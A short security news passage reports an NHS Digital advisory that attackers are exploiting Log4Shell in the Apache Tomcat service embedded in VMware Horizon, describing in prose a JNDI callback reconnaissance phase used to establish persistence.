The warning comes almost exactly one month after the first disclosure of a Log4j remote code execution vulnerability that threatens major damage on the internet and heightens the urgency for enterprise defenders to find and fix the issue.

According to an advisory from NHS Digital, attackers are exploiting the critical vulnerability in the Apache Tomcat service embedded within VMware Horizon.

The NHS Digital team believes the attacks are being used to establish persistence within affected networks and noted that the attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure.